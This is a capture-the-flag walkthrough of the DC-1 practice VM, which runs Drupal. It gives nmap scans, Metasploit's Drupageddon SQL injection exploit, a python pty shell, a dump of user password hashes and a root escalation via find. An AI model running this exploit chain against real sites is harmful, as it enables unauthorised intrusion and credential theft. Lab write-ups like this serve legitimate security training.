environment
kali2018, DC target drone, VM
Scan host
1. Check the MAC address of the DC in net mode as follows
2. Open kali to execute the command while turning on the DC
nmap -sn 192.168.80.0/24
Among the scanned addresses, 192.168.80.138 is the address of kali itself, and 192.168.80.139 is the IP address of the target target machine DC. You can directly access it with a browser to see the DC interface as follows
Viewing the website will reveal the Drupal framework, no other information available, perform a port scan
port scan
nmap -p- -A -v 192.168.80.139
The scan results are as follows:
A total of 4 ports were scanned, among which robots.txt was found on port 80. You can try to access it directly
to get the content of robots.txt as follows:
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites like Yahoo!
# and Google. By telling these "robots" where not to go on your site,
# you save bandwidth and server resources.
#
# This file will be ignored unless it is at the root of your host:
# Used: http://example.com/robots.txt
# Ignored: http://example.com/site/robots.txt
#
# For more information about the robots.txt standard, see:
# http://www.robotstxt.org/wc/robots.html
#
# For syntax checking, see:
# http://www.sxw.org.uk/computing/robots/check.html
User-agent: *
Crawl-delay: 10
# Directories
Disallow: /includes/
Disallow: /misc/
Disallow: /modules/
Disallow: /profiles/
Disallow: /scripts/
Disallow: /themes/
# Files
Disallow: /CHANGELOG.txt
Disallow: /cron.php
Disallow: /INSTALL.mysql.txt
Disallow: /INSTALL.pgsql.txt
Disallow: /INSTALL.sqlite.txt
Disallow: /install.php
Disallow: /INSTALL.txt
Disallow: /LICENSE.txt
Disallow: /MAINTAINERS.txt
Disallow: /update.php
Disallow: /UPGRADE.txt
Disallow: /xmlrpc.php
# Paths (clean URLs)
Disallow: /admin/
Disallow: /comment/reply/
Disallow: /filter/tips/
Disallow: /node/add/
Disallow: /search/
Disallow: /user/register/
Disallow: /user/password/
Disallow: /user/login/
Disallow: /user/logout/
# Paths (no clean URLs)
Disallow: /?q=admin/
Disallow: /?q=comment/reply/
Disallow: /?q=filter/tips/
Disallow: /?q=node/add/
Disallow: /?q=search/
Disallow: /?q=user/password/
Disallow: /?q=user/register/
Disallow: /?q=user/login/
Disallow: /?q=user/logout/
If no extra useful information is obtained, proceed to the next step to scan the website directory.
Use the directory scanner in msfconsole to scan website directories
root@kali:~# msfconsole
msf > use auxiliary/scanner/http/dir_scanner
msf auxiliary(scanner/http/dir_scanner) > set RHOSTS 192.168.80.139
msf auxiliary(scanner/http/dir_scanner) > set THREADS 20
msf auxiliary(scanner/http/dir_scanner) > show options
msf auxiliary(scanner/http/dir_scanner) > run
The scan results are as follows, but most websites are 403, and others are of no practical use.
Query in msfconsole and try tools for Drupal
msf > search drupal
What to find:
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/gather/drupal_openid_xxe 2012-10-17 normal Drupal OpenID External Entity Injection
auxiliary/scanner/http/drupal_views_user_enum 2010-07-02 normal Drupal Views Module Users Enumeration
exploit/multi/http/drupal_drupageddon 2014-10-15 excellent Drupal HTTP Parameter Key/Value SQL Injection
exploit/unix/webapp/drupal_coder_exec 2016-07-13 excellent Drupal CODER Module Remote Command Execution
exploit/unix/webapp/drupal_drupalgeddon2 2018-03-28 excellent Drupal Drupalgeddon 2 Forms API Property Injection
exploit/unix/webapp/drupal_restws_exec 2016-07-13 excellent Drupal RESTWS Module Remote PHP Code Execution
exploit/unix/webapp/php_xmlrpc_eval 2005-06-29 excellent PHP XML-RPC Arbitrary Code Execution
Use the third command to perform SQL injection and execute the following commands in sequence:
msf > use exploit/multi/http/drupal_drupageddon
msf exploit(multi/http/drupal_drupageddon) > set RHOST 192.168.80.139
RHOST => 192.168.80.139
msf exploit(multi/http/drupal_drupageddon) > run
Obtaining the following results indicates successful injection
Then if you check with ls, you will find a flag1.txt file. If you check the website, you will find a prompt, so you need to find the configuration file next.
Drupal's configuration file is located at /sites/default/settings.php, jump to view
Database operations
Failed to enter the database. Enter shell to switch shells and enter the command again. The database will be entered, but the information cannot be echoed.
mysql -udbuser -p
Use the following statement to echo information in the shell.
python -c 'import pty;pty.spawn("/bin/sh")'
get information
mysql> select * from users;
select * from users;
+-----+-------+---------------------------------------------------------+-------------------+-------+-----------+------------------+------------+------------+------------+--------+---------------------+----------+---------+-------------------+------+
| uid | name | pass | mail | theme | signature | signature_format | created | access | login | status | timezone | language | picture | init | data |
+-----+-------+---------------------------------------------------------+-------------------+-------+-----------+------------------+------------+------------+------------+--------+---------------------+----------+---------+-------------------+------+
| 0 | | | | | | NULL | 0 | 0 | 0 | 0 | NULL | | 0 | | NULL |
| 1 | admin | $S$DvQI6Y600iNeXRIeEMF94Y6FvN8nujJcEDTCP9nS5.i38jnEKuDR | [email protected] | | | NULL | 1550581826 | 1550583852 | 1550582362 | 1 | Australia/Melbourne | | 0 | [email protected] | b:0; |
| 2 | Fred | $S$DWGrxef6.D0cwB5Ts.GlnLw15chRRWH2s1R3QBwC0EkvBQ/9TCGg | [email protected] | | | filtered_html | 1550581952 | 1550582225 | 1550582225 | 1 | Australia/Melbourne | | 0 | [email protected] | b:0; |
+-----+-------+---------------------------------------------------------+-------------------+-------+-----------+------------------+------------+------------+------------+--------+---------------------+----------+---------+-------------------+------+
3 rows in set (0.00 sec)
Enter the command from the shell to change the password
and then return to the database to update the password.
Log in to the admin in the browser and you will find the flag3 information.
Use the find command to escalate privileges
It prompts that special permissions are required to obtain the password. First check the passwd and find the location of flag4.
Enter the location of flag4 to view the found content. It shows that privileges need to be elevated to access. Enter
the shell and use root to execute the find command. You will find the final flag.
View the final flag. End!
cat thefinalflag.txt
Well done!!!!
Hopefully you've enjoyed this and learned some new skills.
You can let me know what you thought of this little journey
by contacting me via Twitter - @DCAU7